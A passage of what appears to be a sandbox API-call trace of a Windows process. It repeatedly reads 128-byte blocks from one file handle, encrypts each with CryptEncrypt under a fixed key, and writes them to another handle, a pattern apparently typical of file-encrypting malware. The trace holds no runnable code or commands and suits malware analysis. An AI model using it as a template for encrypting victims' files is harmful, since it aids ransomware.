lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.677] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.677] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.677] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.677] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.678] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.678] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.678] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.678] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.678] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.678] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.678] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.678] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.678] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.678] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.678] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.678] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.678] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.678] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.678] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.679] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.679] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.679] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.679] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.679] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.679] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.679] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.679] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.679] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.679] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.679] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.679] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.679] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.679] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.679] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.679] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.679] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.679] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.679] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.679] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.679] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.679] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.680] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.680] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.680] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.680] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.680] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.680] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.680] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.680] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.680] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.680] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.680] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.680] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.680] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.680] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.680] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.680] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.680] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.680] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.680] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.680] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.680] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.680] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.680] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.680] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.681] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.681] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.681] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.681] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.681] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.681] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.681] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.681] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.681] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.681] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.681] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.681] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.681] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.681] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.681] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.681] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.681] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.681] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.681] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.681] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.681] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.681] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.681] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.681] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.682] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.682] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.682] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.682] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.682] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.682] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.682] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.682] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.682] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.682] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.682] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.682] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.682] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.682] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.682] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.682] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.682] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: 